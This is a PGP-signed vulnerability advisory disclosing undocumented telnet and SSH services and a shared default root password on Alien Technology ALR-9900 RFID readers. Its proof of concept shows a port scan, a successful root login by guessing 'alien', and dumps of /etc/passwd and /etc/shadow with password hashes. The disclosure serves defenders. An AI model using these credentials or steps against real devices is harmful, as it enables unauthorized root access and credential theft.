SecurityvulnsSECURITYVULNS:DOC:23763AlienTechnology ALR-9900 default root password and backdoor
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Tested:
www.alientechnology.com/readers/alr9900.php
Background:
Alien Technology is a major rfid-reader designer and manufacturer.
Alien's products are sold to many corporations and the military.
Alien's readers can be interfaced with in several ways including:
serial, IO Port and Ethernet port. Alien has several daemons
running on their reader that accessible through Ethernet and
completely undocumented. We called Alien several times to ask them
about these undocumented services and were first deferred to
technical support and then had our numbers blocked. We then
emailed them about the security ramifications of these daemons and
received no reply.
The Undocumented:
port 2323 - telnetd
port 23 - telnetd
port 22 - sshd
The Flaws:
default root password = 'alien'
alien account has same password across all readers
port 2323 - provides a backdoor onto the readers for anyone who
knows the alien (or root) account password
port 23 - ""
port 22 - ""
The P.O.C:
Starting Nmap 5.21 ( http://nmap.org ) at 20XX-XX-XX XX:XX Pacific
Daylight Time
Nmap scan report for XXX.XXX.XXX.XXX
Host is up (0.000092s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
80/tcp open http
111/tcp open rpcbind
2323/tcp open unknown
MAC Address: XX:XX:XX:XX:XX:XX (Alien Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds
login as: root
Using keyboard-interactive authentication.
Password: <- root
Access denied
Using keyboard-interactive authentication.
Password: <- password
Access denied
Using keyboard-interactive authentication.
Password: <- alien
Last login: Sun Jan 11 03:04:54 1970 from XXX.XXX.XXX.XXX
root@alien-XXXXXX alien# id
uid=0(root) gid=0(root) groups=0(root)
root@alien-XXXXXX alien# cat /etc/passwd
root:$1$lKC6KEQ/$TY22pTtIBwjLxWd2EvM.d0:0:0:root:/root:/bin/bash
daemon::1:1:daemon:/usr/sbin:/bin/sh
bin::2:2:bin:/bin:/bin/sh
sys::3:3:sys:/dev:/bin/sh
sync::4:65534:sync:/bin:/bin/sync
man::6:12:man:/var/cache/man:/bin/sh
lp::7:7:lp:/var/spool/lpd:/bin/sh
mail::8:8:mail:/var/mail:/bin/sh
news::9:9:news:/var/spool/news:/bin/sh
uucp::10:10:uucp:/var/spool/uucp:/bin/sh
proxy::13:13:proxy:/bin:/bin/sh
www-data::33:33:www-data:/var/www:/bin/sh
backup::34:34:backup:/var/backups:/bin/sh
list::38:38:Mailing List Manager:/var/list:/bin/sh
irc::39:39:ircd:/var/run/ircd:/bin/sh
gnats::41:41:Gnats Bug-Reporting System
(admin):/var/lib/gnats:/bin/sh
nobody::65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:100:65534::/var/run/sshd:/bin/false
ntpd:x:102:102::/var/run/openntpd:/bin/false
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:1000:1000:The
Alien,18220,:/home/alien:/bin/bash
root@alien-XXXXXX alien# cat /etc/shadow
ntpd:!:13602:0:99999:7:::
sshd:!:13602:0:99999:7:::
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:13602:0:99999:7:::
Impact:
Alien's readers are deployed in many secure facilities with
typically closed networks. Although these networks are closed,
these undocumented services could allow employees to modify reader
settings and subvert checkout systems. These checkout systems are
often used to track valuable items making such vulnerabilities a
serious matter. If these readers are deployed on an open or large
network they provide an easy way to tunnel into the network or
attack it from an unexpected location. Lastly, if someone cracks
the alien account's password hash they get to use Alien's backdoor.
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify
wpwEAQMCAAYFAkvgptYACgkQPn8o33YUciG/QQQAkB6HDocLM3zd90K5lSN00sGZyaUc
0e5sraILohD4kk2rkSi/dfvZsrPq30nkMrGqrrgqH5sJTtQ6T24UWvfYUH32H8fGGPzN
Ay8w6R+x61IU/4TZYSCq6xZbdI9yhjfOiTi0vwV3xjuwdKul8Zc6c0e0ih8pULG4dAM8
ZXExxzM=
=Bb1k
-----END PGP SIGNATURE-----